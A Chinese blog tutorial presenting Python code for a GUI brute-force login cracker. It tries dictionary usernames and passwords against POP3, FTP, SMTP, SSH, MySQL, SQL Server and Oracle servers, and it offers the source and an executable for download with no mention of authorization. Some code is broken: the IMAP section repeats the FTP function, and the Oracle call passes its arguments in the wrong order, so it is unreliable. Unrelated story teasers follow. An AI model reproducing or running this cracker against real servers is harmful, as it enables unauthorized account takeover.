太实用了!自己动手写软件——我们的密码破解器终于完成了!!!

之前我们完成了密码破解器的界面,今天菜鸟小白终于实现了软件功能,我们先来看看软件的具体效果吧。

实现效果

我们以ftp协议和Oracle协议为例,看看软件的破解效果。

FTP协议

页面填写


image

破解结果


image

Oracle协议

破解界面配置同ftp界面,点击“提交”后会弹出输入实例名的窗口,输入实例名并回车即可。

image

因为菜鸟小白没有搭建Oracle服务器所以破解失败的结果如下:


image

编码

我们再来看看这样每一个按钮后的软件功能是如何实现的吧。

提交——功能实现

首先我们先完成“提交”功能的实现,“提交”按钮的作用是将用户填写的服务器地址、服务器端口和协议类型信息存储起来,用于后面的密码验证。所以我们先定义了一个字典(因为oracle的数据库连接必须要实例名,所以我们新增了一个db_name)。

dic_list = {'server_ip':'','server_port':'','pro':'','db_name':""}

获取服务器地址和端口我们定义了一个回调函数gettext,将两个Entry对象传递过来后,直接使用一个get命令就可以将Entry中的内容取出来,同时我们添加了对IP和端口的合法性校验。

def gettext(x,y):
    """
    获取输入框内容
    :param x: 输入框对象——服务器IP
    :param y: 输入框对象——服务器端口
    :return:
    """
    server_ip = x.get()
    server_port = y.get()
    #判断输入的IP和端口是否合法
    if (not re.match("[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+\.?",server_ip)):
        tkinter.messagebox._show(title="IP输入不合法", message='请重新输入合法IP')
    # elif not(re.match("^?:([1-6][0-9]{1,4})|([1-9][0-9]{0,3})$",server_port)):
    elif not(re.match("^[1-9]$|(^[1-9][0-9]$)|(^[1-9][0-9][0-9]$)|(^[1-9][0-9][0-9][0-9]$)|(^[1-6][0-5][0-5][0-3][0-5]$)$",server_port)):
        tkinter.messagebox._show(title="端口输入不合法", message='请重新输入合法端口')
    else:
        dic_list["server_port"] = server_port
        dic_list["server_ip"] = server_ip
    print(dic_list["server_ip"],dic_list["server_port"])

对于协议类型的读取,我们定义了一个回调函数get_select,同时我们对协议是否选择进行判断,若没有选择则提示重新选择协议。

def get_select(y,list_pro):
    """
    获取列表的选择
    :param y:列表框对象
    :param list_pro:列表
    """
    for i in range(0, len(list_pro)):
        if y.selection_includes(i):
            #补充dic_list字典中的协议字段内容
            dic_list["pro"] = list_pro[i]
        else:
            pass
    if dic_list["pro"]=="":
        tkinter.messagebox._show(title="协议未选择", message='请重新破解协议')
    elif dic_list["pro"]=='Oracle':
        dic_list['db_name']=getInput("Oracle实例","请输入Oracle实例信息")
        print(dic_list['db_name'])

同时我们添加了一个对oracle协议的判断,若选择oracle协议则需要弹出一个窗口填写数据库实例名称。我们新增了一个弹框输入的函数get_Input进行调用。

def getInput(title, message):
    def return_callback(event):
        print('quit...')
        root.quit()
​
    def close_callback():
        tkinter.messagebox.showinfo('message', 'no click...')
​
    root = tkinter.Tk(className=title)
    root.wm_attributes('-topmost', 1)
    screenwidth, screenheight = root.maxsize()
    width = 300
    height = 100
    size = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)
    root.geometry(size)
    root.resizable(0, 0)
    lable = tkinter.Label(root, height=2)
    lable['text'] = message
    lable.pack()
    entry = tkinter.Entry(root)
    entry.bind('<Return>', return_callback)
    entry.pack()
    entry.focus_set()
    root.protocol("WM_DELETE_WINDOW", close_callback)
    root.mainloop()
    str = entry.get()
    root.destroy()
    return str

这样我们的“提交”按钮功能就全部完成了。接下来我们看看“开始破解”菜单按钮的功能。

开始破解——功能实现

我们定义了一个回调函数为mimapojie

  1. 首先会读取密码字典

  2. 然后是选择协议并执行破解动作

  3. 最后是展示破解结果

def mimapojie(server_ip,server_port,pro):
    get_user_and_passwd('./test.xls', 0)
    print_list = choice_protocol(server_ip, int(server_port), pro,dic_list['db_name'])
    #展示破解结果
    tkinter.messagebox._show(title='破解结果',message=dic_list['pro'],detail=print_list)

接下来我们依次看看这三个方面都是如何实现的。

读取密码字典

我们使用的是我们之前文章中使用的读取Excel表格的方式,我们直接将第一列的内容读取到user_list列表中,将第二列内容读取到password_list列表中。

def get_user_and_passwd(file_path, sheet_id):
    """
    获取密码库中的用户名密码
    :param file_path: 密码库的路径及文件名
    :param sheet_id: 密码库中的sheet id
    """
    read_excel = ReadAndWriteExcel.OpenExcel(file_name=file_path, sheet_id=sheet_id)
    rows = read_excel.get_lines()
    global user_list
    global password_list
    for i in range(0, rows):
        if read_excel.get_value(i, 0):
            user_list.append(read_excel.get_value(i, 0))
        if read_excel.get_value(i, 1):
            password_list.append(read_excel.get_value(i, 1))

选择协议并执行破解动作

我们定义了一个选择协议函数,根据获取到的选择协议字段执行不同的破解函数。

def choice_protocol(server_ip,server_port, pro,db_name):
    """
    选择需要破解的协议
    :param server_ip:需要破解的服务器IP
    :param server_port:需要破解的服务器端口
    :param pro: 需要破解的协议
    :param db_name: oracle数据库的实例名
    """
    if  pro == "POP3":
        attempt_pop(server_ip, server_port)
    elif pro == "IMAP":
        print('this is a test')
        attempt_imap(server_ip, server_port)
    elif pro == "SMTP":
        attempt_smtp(server_ip, server_port)
    elif pro == "FTP":
        attempt_ftp(server_ip, server_port)
    elif pro == "SSH":
        attempt_ssh(server_ip, server_port)
    elif pro == 'MySql':
        attempt_mysql(server_ip, server_port)
    elif pro == "SQL Server":
        attempt_mssql(server_ip, server_port)
    elif pro == "Oracle":
        attempt_oracle(server_ip, server_port,db_name)
​
    return print_list

POP3协议的破解函数

def attempt_pop(server_ip, server_port):
    """
    破解POP3协议的用户名密码
    :param server_ip: 破解的服务器IP
    :param server_port: 破解的服务器端口
    """
    print("=======破解POP3协议========")
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                pop3_server = poplib.POP3(host=server_ip,port=server_port)
                pop3_server.user(user_list[i])
                pop3_server.pass_(password_list[j])
                #获取邮件列表,用于判断是否登录成功
                pop3_server.list()
                print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
            except:
                pass
    if not print_list:
        print_list.append("密码破解失败")

IMAP协议的破解函数

def attempt_ftp(server_ip,port=21):
    """
    破解FTP协议的用户名密码
    :param server_ip: 破解的服务器IP
    :param port: 破解的服务器端口,默认为21
    """
    ftp = FTP()
    ftp.connect(server_ip, port)
    global print_list
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                ftp.login(user_list[i], password_list[j])
                ftp.quit()
                print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
            except:
                pass
    if not print_list:
        print_list.append("密码破解失败")

SMTP协议的破解函数

def attempt_smtp(mail_host, port=25):
    """
    破解SMTP协议的用户名密码
    :param mail_host: 破解的服务器IP
    :param show_flag: 标志位,True代表展示破解失败的用户名密码,False代表仅展示破解成功的用户名密码
    :param port: 破解服务器的端口,默认为25
    """
    print("=======破解SMTP协议========")
​
    global user_list
    global password_list
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                smtpObj = smtplib.SMTP(timeout=3)
                smtpObj.set_debuglevel(0)
                smtpObj.connect(mail_host, port)  # 25 为 SMTP 端口号
                smtpObj.login(user_list[i], password_list[j])
                print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
            except Exception as e:
                print(e)
                pass
    if not print_list:
        print_list.append("密码破解失败")

FTP协议的破解函数

def attempt_ftp(server_ip,port=21):
    """
    破解FTP协议的用户名密码
    :param server_ip: 破解的服务器IP
    :param port: 破解的服务器端口,默认为21
    """
    ftp = FTP()
    ftp.connect(server_ip, port)
    global print_list
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                ftp.login(user_list[i], password_list[j])
                ftp.quit()
                print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
            except:
                pass
    if not print_list:
        print_list.append("密码破解失败")

SSH协议的破解函数

def attempt_ssh(server_ip, port=22):
    """
    破解SSH协议的用户名密码
    :param server_ip: 破解的服务器IP
    :param port: 破解的服务器端口,默认为22
    """
    print("=======破解SSH协议========")
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    global user_list
    global password_list
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                ssh.connect(hostname=server_ip, port=port, username=user_list[i], password=password_list[j])
                print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
            except:
                pass
    if not print_list:
        print_list.append("密码破解失败")

MySQL协议的破解函数

def attempt_mysql(server_ip, server_port=3306,db_name='mysql'):
    """
    破解MySQL协议的用户名密码
    :param server_ip: 破解的服务器IP
    :param show_flag: 标志位,True代表展示破解失败的用户名密码,False代表仅展示破解成功的用户名密码
    """
    print("=======破解MYSQL协议========")
    global user_list
    global password_list
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                # pymysql.connect(host=server_ip,port=server_port,user=user_list[i],passwd=password_list[j],db=db_name)
                db = pymysql.connect(server_ip, user_list[i], password_list[j])
                db.close()
                print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
            except:
                pass
    if not print_list:
        print_list.append("密码破解失败")

SQL server协议的破解函数

def attempt_mssql(server_ip, server_port):
    """
    破解SQL server协议的用户名密码
    :param server_ip: 破解的服务器IP
    :param server_port: 破解的服务器端口
    """
    print("=======破解SQL Server协议========")
    global user_list
    global password_list
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                db = pymssql.connect(server_ip,user_list[i],password_list[j])
                db.close()
                # print("用户名:%s,密码:%s登录成功" % (user_list[i], password_list[j]))
                print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
            except:
                pass
    if not print_list:
        print_list.append("密码破解失败")

Oracle协议的破解函数

def attempt_oracle(server_ip,db_name, port=1521 ):
    """
    破解Oracle协议的用户名密码
    :param server_ip: 破解的服务器IP
    :param show_flag: 标志位,True代表展示破解失败的用户名密码,False代表仅展示破解成功的用户名密码
    :param port: 破解的服务器端口,默认为1521
    """
    print("=======破解Oracle协议========")
    global user_list
    global password_list
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                cx_Oracle.connect(user_list[i]+'/'+password_list[j]+'@'+server_ip+':'+str(port)+'/'+db_name)
                # print("用户名:%s,密码:%s登录成功" % (user_list[i], password_list[j]))
                print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
            except Exception as e:
                pass
    if not print_list:
        print_list.append("密码破解失败")

程序获取

老规矩,关注公众号“菜鸟小白的学习分享”。

  1. 回复“密码破解源码”即可获得源码下载链接
  2. 回复“密码破解可执行程序”即可获得工具软件

好了,今天的内容就结束了。今天合肥这边下了一天的雨,菜鸟小白都没有出去,你们呢?

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,657评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,662评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 158,143评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,732评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,837评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,036评论 1 291
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,126评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,868评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,315评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,641评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,773评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,470评论 4 333
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,126评论 3 317
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,859评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,095评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,584评论 2 362
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,676评论 2 351